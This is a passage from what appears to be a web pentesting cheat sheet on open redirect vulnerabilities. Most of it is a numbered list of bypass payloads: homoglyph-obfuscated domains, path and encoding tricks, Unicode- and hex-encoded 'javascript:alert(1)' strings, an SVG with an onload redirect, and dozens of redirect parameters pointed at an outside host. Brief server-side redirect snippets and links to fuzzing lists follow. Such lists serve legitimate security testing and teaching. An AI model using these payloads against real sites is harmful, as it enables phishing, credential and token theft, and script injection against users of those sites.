//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ\twhitelisted.com/
440
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
441
////[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
442
////[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
443
///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
444
///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
445
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/whitelisted.com
446
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ\@whitelisted.com
447
//[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
448
//[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
449
Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/whitelisted.com
450
whitelisted.com;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
451
////[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
452
///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
453
////[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
454
///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
455
//[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
456
////[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
457
///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
458
//[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
459
////[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
460
///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
461
//[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
462
/\whitelisted.com:80%40google.com
463
[email protected]%E2%80%[email protected]
464
////[email protected]//
465
////[email protected]/
466
///[email protected]//
467
///[email protected]/
468
//[email protected]//
469
//[email protected]/
470
whitelisted.com;@google.com
471
whitelisted.com.google.com
472
////[email protected]/%2e%2e
473
///[email protected]/%2e%2e
474
////[email protected]/%2e%2e%2f
475
///[email protected]/%2e%2e%2f
476
//[email protected]/%2e%2e%2f
477
////[email protected]/%2f..
478
///[email protected]/%2f..
479
//[email protected]/%2f..
480
////[email protected]/%2f%2e%2e
481
///[email protected]/%2f%2e%2e
482
//[email protected]/%2f%2e%2e
483
//whitelisted.com+&@google.com#[email protected]/
484
//[email protected]:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
485
//[email protected]:///google.com/%2e%2e
486
//whitelisted.com+&@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ#[email protected]/
487
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
488
//XY>.7d8T\[email protected]@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
489
//XY>.7d8T\[email protected][email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
490
//XY>.7d8T\[email protected]@google.com/
491
//XY>.7d8T\[email protected][email protected]/
Copied!
Open Redirect uploading svg files
1
<code>
2
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
3
<svg
4
onload="window.location='http://www.example.com'"
5
xmlns="http://www.w3.org/2000/svg">
6
</svg>
7
</code>
Copied!
Common injection parameters
1
/{payload}
2
?next={payload}
3
?url={payload}
4
?target={payload}
5
?rurl={payload}
6
?dest={payload}
7
?destination={payload}
8
?redir={payload}
9
?redirect_uri={payload}
10
?redirect_url={payload}
11
?redirect={payload}
12
/redirect/{payload}
13
/cgi-bin/redirect.cgi?{payload}
14
/out/{payload}
15
/out?{payload}
16
?view={payload}
17
/login?to={payload}
18
?image_url={payload}
19
?go={payload}
20
?return={payload}
21
?returnTo={payload}
22
?return_to={payload}
23
?checkout_url={payload}
24
?continue={payload}
25
?return_path={payload}
26
success=https://c1h2e1.github.io
27
data=https://c1h2e1.github.io
28
qurl=https://c1h2e1.github.io
29
login=https://c1h2e1.github.io
30
logout=https://c1h2e1.github.io
31
ext=https://c1h2e1.github.io
32
clickurl=https://c1h2e1.github.io
33
goto=https://c1h2e1.github.io
34
rit_url=https://c1h2e1.github.io
35
forward_url=https://c1h2e1.github.io
36
@https://c1h2e1.github.io
37
forward=https://c1h2e1.github.io
38
pic=https://c1h2e1.github.io
39
callback_url=https://c1h2e1.github.io
40
jump=https://c1h2e1.github.io
41
jump_url=https://c1h2e1.github.io
42
click?u=https://c1h2e1.github.io
43
originUrl=https://c1h2e1.github.io
44
origin=https://c1h2e1.github.io
45
Url=https://c1h2e1.github.io
46
desturl=https://c1h2e1.github.io
47
u=https://c1h2e1.github.io
48
page=https://c1h2e1.github.io
49
u1=https://c1h2e1.github.io
50
action=https://c1h2e1.github.io
51
action_url=https://c1h2e1.github.io
52
Redirect=https://c1h2e1.github.io
53
sp_url=https://c1h2e1.github.io
54
service=https://c1h2e1.github.io
55
recurl=https://c1h2e1.github.io
56
j?url=https://c1h2e1.github.io
57
url=//https://c1h2e1.github.io
58
uri=https://c1h2e1.github.io
59
u=https://c1h2e1.github.io
60
allinurl:https://c1h2e1.github.io
61
q=https://c1h2e1.github.io
62
link=https://c1h2e1.github.io
63
src=https://c1h2e1.github.io
64
tc?src=https://c1h2e1.github.io
65
linkAddress=https://c1h2e1.github.io
66
location=https://c1h2e1.github.io
67
burl=https://c1h2e1.github.io
68
request=https://c1h2e1.github.io
69
backurl=https://c1h2e1.github.io
70
RedirectUrl=https://c1h2e1.github.io
71
Redirect=https://c1h2e1.github.io
72
ReturnUrl=https://c1h2e1.github.io
Copied!
Code examples
.Net
1
response.redirect("~/mysafe-subdomain/login.aspx")
Copied!
Java
1
response.redirect("http://mysafedomain.com");
Copied!
PHP
1
<?php
2
/* browser redirections*/
3
header("Location: http://mysafedomain.com");
4
exit;
5
?>
Copied!
Tools
​https://github.com/0xNanda/Oralyzer​
Resources
In https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect you can find fuzzing lists.
https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html
https://github.com/cujanovic/Open-Redirect-Payloads​

Pentesting Web - Previous

OAuth to Account takeover

Next - Pentesting Web

Parameter Pollution

Last modified 3mo ago

Copy link

Contents

Open Redirect uploading svg files

Common injection parameters

Code examples

Tools

Resources